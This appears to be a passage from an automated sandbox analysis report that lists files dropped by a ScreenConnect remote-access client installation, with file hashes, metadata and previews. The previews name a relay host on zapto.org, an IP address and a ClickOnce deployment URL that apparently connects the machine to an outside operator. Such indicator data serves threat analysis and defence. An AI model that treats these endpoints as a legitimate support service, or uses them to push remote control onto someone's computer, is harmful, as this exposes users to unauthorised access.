                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHK:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHY
                                                                                                                                                                                                                                                      MD5:6E88FAD97F4CFC0339D8D71F55326EDF
                                                                                                                                                                                                                                                      SHA1:7FE09E6D87B7CA210C8D7AFA9D69380528A6D4F2
                                                                                                                                                                                                                                                      SHA-256:F09E170444003576AD24985C8B4873E7CBDC18863A4943A1FDEB0E3249812806
                                                                                                                                                                                                                                                      SHA-512:023175F24C652E73946A01DB84579BAF00D4447AFA01CD2EA09820964DCA10D9C24C7DD7F37109A836996477B4C9804B75830C95A790B5598564395272F98A15
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ShowFeedbackSurveyForm" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessShowUnderControlBanner" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="AccessHideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="HideWallpaperOnConnect" serializeAs="String">.. <value>false</value>.. </setting>.. <setting name="SupportShowBalloonOnConnect" serializeAs="String">.. <value>fa

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\user.config (copy)

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.071856827733907
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDOt/vXbAa3xT:2dL9hK6E46YPoXovH
                                                                                                                                                                                                                                                      MD5:9CC4A91172217A43CDA36ED88FA9CD64
                                                                                                                                                                                                                                                      SHA1:1784CA72723E2C19B5BE41EB0FD062794FD09090
                                                                                                                                                                                                                                                      SHA-256:B241E5DA017F6A21D5F7E37A01CFC5C48B3A3F46E3824FCA78420F3A7AA3694B
                                                                                                                                                                                                                                                      SHA-512:30F2A2B2A3BC5DA6E1294F9F91CAD485BDF1413158FD4C2BD70F9B4DEB64000B019FF6E883DBEDF9B3D8FDCF050A8F61B0F6660ED50290300AA48939A22D11AD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a53</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\zb0m0p4i.newcfg

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):562
                                                                                                                                                                                                                                                      Entropy (8bit):5.071856827733907
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOKTQCDOt/vXbAa3xT:2dL9hK6E46YPoXovH
                                                                                                                                                                                                                                                      MD5:9CC4A91172217A43CDA36ED88FA9CD64
                                                                                                                                                                                                                                                      SHA1:1784CA72723E2C19B5BE41EB0FD062794FD09090
                                                                                                                                                                                                                                                      SHA-256:B241E5DA017F6A21D5F7E37A01CFC5C48B3A3F46E3824FCA78420F3A7AA3694B
                                                                                                                                                                                                                                                      SHA-512:30F2A2B2A3BC5DA6E1294F9F91CAD485BDF1413158FD4C2BD70F9B4DEB64000B019FF6E883DBEDF9B3D8FDCF050A8F61B0F6660ED50290300AA48939A22D11AD
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>kjh231a.zapto.org=79.110.49.185-25%2f10%2f2024%2017%3a27%3a53</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                      MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                      SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                      SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                      SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............" ..0.............. ... ...@....... ....................................@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1373
                                                                                                                                                                                                                                                      Entropy (8bit):5.369201792577388
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KaXE4qpAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQ71qHGIs0HKEHmAHKKkKYHKGSI65
                                                                                                                                                                                                                                                      MD5:1BF0A215F1599E3CEC10004DF6F37304
                                                                                                                                                                                                                                                      SHA1:169E7E91AC3D25D07050284BB9A01CCC20159DE7
                                                                                                                                                                                                                                                      SHA-256:D9D84A2280B6D61D60868F69899C549FA6E4536F83785BD81A62C485C3C40DB9
                                                                                                                                                                                                                                                      SHA-512:68EE38EA384C8C5D9051C59A152367FA5E8F0B08EB48AA0CE16BCE2D2B31003A25CD72A4CF465E6B926155119DAB5775A57B6A6058B9E44C91BCED1ACCB086DB
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dfsvc.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):1662
                                                                                                                                                                                                                                                      Entropy (8bit):5.368796786510097
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:M1H2HKQ71qHGIs0HKGAHKKkKYHKGSI6oPtHTH+JHvHlu:gWq+wmj0qxqKkKYqGSI6oPtzHIPQ
                                                                                                                                                                                                                                                      MD5:F133699E2DFF871CA4DC666762B5A7FF
                                                                                                                                                                                                                                                      SHA1:185FC7D230FC1F8AFC9FC2CF4899B8FFD21BCC57
                                                                                                                                                                                                                                                      SHA-256:9BA0C7AEE39ACD102F7F44D289F73D94E2FD0FCD6005A767CD63A74848F19FC7
                                                                                                                                                                                                                                                      SHA-512:8140CDCE2B3B92BF901BD143BFC8FB4FE8F9677036631939D30099C7B2BB382F1267A435E1F5C019EFFFF666D7389F77B06610489D73694FA31D16BD04CAF20A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, Pu

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ScreenConnect.ClientService.exe.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Apps\2.0\Q3JDG51V.APM\A1EBH2Z2.XZ4\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exe
                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):847
                                                                                                                                                                                                                                                      Entropy (8bit):5.345615485833535
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                                                                                                                                                                                                                                      MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                                                                                                                                                                                                                                      SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                                                                                                                                                                                                                                      SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                                                                                                                                                                                                                                      SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q8X2NUFH\3Q2U6NXT.log

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with very long lines (621), with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):14986
                                                                                                                                                                                                                                                      Entropy (8bit):3.817834412062261
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:96:t6BKasdrv5yInMSiY1bBBaOy0lmsdrv5yInMSiY8NYG/5DD8vkBusdrv5yInMSii:D5y8V1baU5y8VkDp5y8VoJLEv
                                                                                                                                                                                                                                                      MD5:51900B3FB677902E17F0D3CE987937C5
                                                                                                                                                                                                                                                      SHA1:8519D5B4C39B4873FC8EB63EBD43DB6A91D085C4
                                                                                                                                                                                                                                                      SHA-256:D5E4E026098CC7A35B25E331B2CDDA3041A979902CE9B11ECCB2F81E4A040D1E
                                                                                                                                                                                                                                                      SHA-512:CCBEC483999A800AC7EA2AC00BA6AB7E45B6558CDF3220BEFBFE69FB48F14E8173DFF604B597384AAA0CA260E7BFBE118A831C0EBA0C3175C9D9FA3E19B79DD1
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..P.L.A.T.F.O.R.M. .V.E.R.S.I.O.N. .I.N.F.O.......W.i.n.d.o.w.s. .......:. .1.0...0...1.9.0.4.5...0. .(.W.i.n.3.2.N.T.).......C.o.m.m.o.n. .L.a.n.g.u.a.g.e. .R.u.n.t.i.m.e. ...:. .4...0...3.0.3.1.9...4.2.0.0.0.......S.y.s.t.e.m...D.e.p.l.o.y.m.e.n.t...d.l.l. .....:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......c.l.r...d.l.l. .......:. .4...8...4.5.1.5...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.d.l.l...d.l.l. .......:. .4...8...4.2.7.0...0. .b.u.i.l.t. .b.y.:. .N.E.T.4.8.R.E.L.1.L.A.S.T._.C.......d.f.s.h.i.m...d.l.l. .......:. .1.0...0...1.9.0.4.1...3.0.0.0.0. .(.W.i.n.B.u.i.l.d...1.6.0.1.0.1...0.8.0.0.).........S.O.U.R.C.E.S.......D.e.p.l.o.y.m.e.n.t. .u.r.l.......:. .h.t.t.p.s.:././.s.e.c.u.r.e...s.t.a.n.s.u.p...c.o.m./.B.i.n./.S.c.r.e.e.n.C.o.n.n.e.c.t...C.l.i.e.n.t...a.p.p.l.i.c.a.t.i.o.n.?.e.=.S.u.p.p.o.r.t.&.y.=.G.u.e.s.t.&.h.=.k.j.h.2.3.1.a...z.a.p.t.o...o.r.g.&.p.=.8.0.4.1.&.s.=.a.e.0.9.5.c.2.3.-.8.e.2.2.-.4.7.4.7.-.b.9.a.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):197120
                                                                                                                                                                                                                                                      Entropy (8bit):6.584712994459805
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3072:mxGtNaldxI5KY9h12MMusqVFJRJcyzvfquFzDvJXYyB:1tNalc5fr12MbPJY8quFGy
                                                                                                                                                                                                                                                      MD5:4D94014D41DE954AEE952C1B930BA395
                                                                                                                                                                                                                                                      SHA1:35A776D4B569C5367F61A68A577CE92086E682E2
                                                                                                                                                                                                                                                      SHA-256:AD8FC048CE7A61C1AF0428B7B3989163A215A9378417CAC6FBF232D0538405C3
                                                                                                                                                                                                                                                      SHA-512:0ACA355B24FAF86B6C321E88321EFF542F277331745010C3A495AAE6F2F123E518284CB7445F78A83BCE3A61BDFFD1AA3FC082E7DC854218B5D7AF95478414F8
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5............" ..0.................. ... ....... .......................`......].....@.................................-...O.... ..|....................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc...|.... ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*..{....*:.(......}....*.0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o....*....0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=...*..0...........~*...%-.&~).....|...s&...%.*...(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.Client.dll.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                                                                                                      Entropy (8bit):5.154101033983839
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:MMHdF4XZ8i9o9olxbv5NEgVkP0AJR7vNxW57FpS+iENg49vNxW5NgMCNg49vNxWO:JdFYZ8h9onRigeP0AKvSkcyMwcVSkTo
                                                                                                                                                                                                                                                      MD5:CD5FD6DC905D01654E81EAD73F6CE116
                                                                                                                                                                                                                                                      SHA1:9A3ED5183F323F33C37755B90B45D401D45AC46C
                                                                                                                                                                                                                                                      SHA-256:51F959457A28D492E123B6B2982865716E8A811CF43DE856033C24CE34C0B187
                                                                                                                                                                                                                                                      SHA-512:25CA0DBBC602C6B61ACA7DA840A2353FD8C5C7FB3B311544DDCC3B1936B3A0F72A93D32E38093AB8B30935211EB4D260EC766EA5C9FBD90D50740EACA54BC052
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.Client" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.Client.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="System" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependent

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dll

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):68096
                                                                                                                                                                                                                                                      Entropy (8bit):6.069003835678311
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:vA0ZscQ5V6TsQqoSDih6+39QFVIl1LJhb8gF:o0Zy3IUOQFVQLJF
                                                                                                                                                                                                                                                      MD5:47C0BF8CC60128C530A930637822EA78
                                                                                                                                                                                                                                                      SHA1:6FBAF1C36AF7DFCA4B4970A9F71C1DCD8B7A57F9
                                                                                                                                                                                                                                                      SHA-256:EA71F7DCBE7E754EEF4ED40A931EDA12FEF7063B173A5B1D5095F683B254504C
                                                                                                                                                                                                                                                      SHA-512:D2CBF3BCC53D0D340984617867F22CB43CE5A336B7B844E2F339B308FF28C955F5F3C7217C5ECDFE509B45DBD519BD733C3C9B9C6B8ABA945B8E6A288B495B17
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k............" ..0.............. ... ...@....... ....................................@.................................e ..O....@.......................`..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................. ......H........n..@...................<.........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*.~,...%-.&~+.....i...s....%.,...(...+*vs....%.}P.........s....(....*....0...........s....}.....s....}...........}.......(&.....}.....(....&.()..........s....o.....()...~-...%-.&~+.....j...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s=...}....... ..6........s....s=...}.....('...($............o%........

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.dll.genman

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1632
                                                                                                                                                                                                                                                      Entropy (8bit):5.092740375848212
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:JdFYZ8h9onRzgeP0AW+vSkcyMwcbEMwcuMwcVSkcf5bdTo:3FYZ8h9o9gI0AWCHMwTMw3MwGAXTo
                                                                                                                                                                                                                                                      MD5:219DBCD947D7BBDF0BBC78778286B8C7
                                                                                                                                                                                                                                                      SHA1:E95D66F48C130644CE421CBBBFCF3D376FEBAC4E
                                                                                                                                                                                                                                                      SHA-256:C92BB401516771F702CD0986219589CA90E7DE089C8CF4DD825D904985299796
                                                                                                                                                                                                                                                      SHA-512:9E147F80D629AA00C4E0CB8DB708635BA6C14FDE30B8A5574927197352747B43B063060EB4D201C2B4AC984A9F4C84F5F774EB29DE481A0FEE572FB7B0C31F13
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.3.8936" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.3.8936" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" version=

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\Deployment\AV4P72YG.WNT\QWOXXCB2.CR6\ScreenConnect.ClientService.exe

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):95520
                                                                                                                                                                                                                                                      Entropy (8bit):6.504144260093153
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:1536:Sg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoU0HMu7axl:jhbNDxZGXfdHrX7rAc6myJkgoU0HVI
                                                                                                                                                                                                                                                      MD5:200A917996F0FC74879076354454473A
                                                                                                                                                                                                                                                      SHA1:15886A7D4385D7EC4F7C8837D7218D46E5B3DD9C
                                                                                                                                                                                                                                                      SHA-256:0B2824097ABE3211AAC5FEDA8DC4D300BA51801D9FBED9EB8330B433A66AC001
